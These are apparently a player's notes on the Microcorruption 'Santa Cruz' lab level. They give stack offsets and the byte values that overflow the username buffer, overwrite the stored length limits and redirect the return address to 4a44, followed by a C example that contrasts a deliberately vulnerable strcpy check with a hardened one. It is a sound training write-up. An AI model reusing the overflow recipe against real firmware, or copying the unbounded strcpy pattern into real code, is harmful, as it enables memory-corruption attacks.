MicroCorruption/10-Santa Cruz/notes.md

Taken verbatim from my notebook

Page 1

Santa Cruz
    2 buffers
        username [0x63] -> 2404 -> 43a2
        password [0x63] -> 2404 -> 43b5
    r4: return addr: 43cc
    Min len stored at 43b3
        username +0x11      index 17
    Max len stored at 43b4
        username +0x12      index 18
    43c6 must be 00
     -> password must be 16 chars
        so strcpy places 00 there
     -> password: "passwordpassword"

    username[0x11] = 01
    username[0x12] = 7f
    username[0x42+]= 4a44

    Don't put important constants on the stack?
    Strcpy does copy the last null byte

    A program
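
The two takeaways above (length limits kept on the stack next to the buffer, and strcpy copying the terminating null byte), shown as an added example that is not part of the original notes or the level's code. The frame is simulated in a flat array; the function names, `MIN_LEN`/`MAX_LEN` values and `FRAME` size are assumptions, and only the +0x11/+0x12 offsets and the 01/7f bytes come from the notes.

```c
#include <stdio.h>
#include <string.h>

/* Simulated frame (not the real firmware): offsets follow the notes,
 * min at username+0x11 and max at username+0x12; the rest is assumed. */
enum { OFF_USER = 0, OFF_MIN = 0x11, OFF_MAX = 0x12, OFF_PASS = 0x13, FRAME = 0x40 };
enum { MIN_LEN = 8, MAX_LEN = 16 };            /* assumed policy values */
/* Constructed input: 17 filler bytes, then the 01 and 7f bytes from the notes. */
static const char LONG_USER[] = "AAAAAAAA" "AAAAAAAA" "A" "\x01\x7f";

/* Before: unbounded strcpy, and the bounds are read back from the frame. */
int check_vulnerable(const char *user, const char *pass) {
    unsigned char f[FRAME];
    /* Simulation guard only: keeps the demo inside the array. */
    if (strlen(user) >= (size_t)FRAME || strlen(pass) >= (size_t)(FRAME - OFF_PASS)) return 0;
    memset(f, 0xAA, sizeof f);
    f[OFF_MIN] = MIN_LEN; f[OFF_MAX] = MAX_LEN;
    strcpy((char *)f + OFF_USER, user);        /* can run over OFF_MIN / OFF_MAX */
    strcpy((char *)f + OFF_PASS, pass);
    size_t n = strlen((char *)f + OFF_PASS);
    return n >= (size_t)f[OFF_MIN] && n <= (size_t)f[OFF_MAX];
}

/* After: bounds are compile-time constants, lengths are checked before copying. */
int check_hardened(const char *user, const char *pass) {
    char u[OFF_MIN], p[MAX_LEN + 1];
    size_t ul = strlen(user), pl = strlen(pass);
    if (ul >= sizeof u || pl < MIN_LEN || pl > MAX_LEN) return 0;
    memcpy(u, user, ul + 1);
    memcpy(p, pass, pl + 1);
    return 1;
}

/* strcpy writes strlen(src)+1 bytes: the byte right after the text becomes 00. */
int strcpy_writes_nul(const char *src) {
    unsigned char f[FRAME];
    size_t n = strlen(src);
    if (n + 1 >= (size_t)FRAME) return 0;
    memset(f, 0xAA, sizeof f);
    strcpy((char *)f, src);
    return f[n] == 0x00 && f[n + 1] == 0xAA;
}

int main(void) {
    printf("vulnerable, short user: %d\n", check_vulnerable("alice", "abc"));
    printf("vulnerable, long user:  %d\n", check_vulnerable(LONG_USER, "abc"));
    printf("hardened, long user:    %d\n", check_hardened(LONG_USER, "abc"));
    return 0;
}
```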